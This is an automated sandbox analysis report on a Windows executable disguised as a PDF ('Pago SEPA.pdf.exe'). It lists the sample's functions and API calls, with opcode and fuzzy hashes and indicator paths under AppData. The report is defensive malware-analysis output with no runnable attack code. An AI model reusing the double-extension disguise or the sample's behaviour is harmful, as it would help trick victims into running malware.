                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                      • Instruction ID: 29b39a71cad52391c8dc255d064a3e1ff9ef0cb324877085b5716ecfb2dd3a49
                                                                      • Opcode Fuzzy Hash: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                      • Instruction Fuzzy Hash: 80B09236A84200BADA214B00ED09F857A62A76C701F008864B300240B0CAB284A2DB19
                                                                      Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403504,?), ref: 00403230
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                      Function 00404105 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403EDD), ref: 0040410F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
                                                                      • Instruction ID: 08b0993790eca83da4683932159a1945e4cd9185bce414af844fcd550f832719
                                                                      • Opcode Fuzzy Hash: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
                                                                      • Instruction Fuzzy Hash: 9AA01132808000ABCA028B80EF08C0ABB22FBE0300B008838F2008003083320820EB0A

                                                                      Non-executed Functions

                                                                      Function 00404AFA Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B12
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B1D
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B7A
                                                                      • SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
                                                                      • DeleteObject.GDI32(00000000), ref: 00404BF0
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D4A
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F1A
                                                                      • GlobalFree.KERNEL32(?), ref: 00404F2A
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C9
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050D4
                                                                      • ShowWindow.USER32(00000000), ref: 004050DB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                      • Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
                                                                      • Opcode Fuzzy Hash: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                      • Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58
                                                                      Function 0040457E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045CD
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F7
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A8
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046B3
                                                                      • lstrcmpiW.KERNEL32(004271C0,00422708,00000000,?,?), ref: 004046E5
                                                                      • lstrcatW.KERNEL32(?,004271C0), ref: 004046F1
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404703
                                                                        • Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A), ref: 0040575B
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
                                                                        • Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D
                                                                      • GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047E1
                                                                        • Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                        • Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
                                                                        • Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                      Strings
                                                                      • A, xrefs: 004046A1
                                                                      • C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 004046CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
                                                                      • API String ID: 2624150263-3694781455
                                                                      • Opcode ID: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                      • Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
                                                                      • Opcode Fuzzy Hash: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                      • Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69
                                                                      Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(0040749C,?,00000001,0040748C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 00402154
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
                                                                      • API String ID: 542301482-1972456662
                                                                      • Opcode ID: 87a5f908d3bd2182804ba30c2672ef8e3d0a2ca2c39b5d61ff5879bf35877680
                                                                      • Instruction ID: 6cbe38940624da38e40774ab578681f1f604b85ca8fb8198b005fe2b44c0e728
                                                                      • Opcode Fuzzy Hash: 87a5f908d3bd2182804ba30c2672ef8e3d0a2ca2c39b5d61ff5879bf35877680
                                                                      • Instruction Fuzzy Hash: A7411D75A00208AFCF00DFA4CD889AD7BB5FF48314B20457AF515EB2D1D7799A41CB55
                                                                      Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: b0aae25d2898bb461b76f53aafdea6f4486cb2c90bd3fc953c79824aff6e0f85
                                                                      • Instruction ID: 5886dfe4bc611d4993f15ed40ae28ce81127269af5662ddb55851ccd49cbf6f1
                                                                      • Opcode Fuzzy Hash: b0aae25d2898bb461b76f53aafdea6f4486cb2c90bd3fc953c79824aff6e0f85
                                                                      • Instruction Fuzzy Hash: 10F05E71A00115ABC711EFA4DD49AAEB378FF04324F1005BBF105E21E1D6B89A409B29
                                                                      Function 00404280 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404332
                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
                                                                      • GetSysColor.USER32(?), ref: 00404360
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
                                                                      • lstrlenW.KERNEL32(?), ref: 00404381
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043FC
                                                                      • SendMessageW.USER32(00000000), ref: 00404403
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040442E
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447F
                                                                      • SetCursor.USER32(00000000), ref: 00404482
                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044A3
                                                                      • SetCursor.USER32(00000000), ref: 004044A6
                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: N$open
                                                                      • API String ID: 3615053054-904208323
                                                                      • Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                      • Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
                                                                      • Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                      • Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9
                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                      • Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
                                                                      • Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                      • Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5
                                                                      Function 00405D4E Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcpyW.KERNEL32(00425DA8,NUL,?,00000000,?,00409300,00405EE1,?,?), ref: 00405D5D
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00409300,00405EE1,?,?), ref: 00405D81
                                                                      • GetShortPathNameW.KERNEL32(?,00425DA8,00000400), ref: 00405D8A
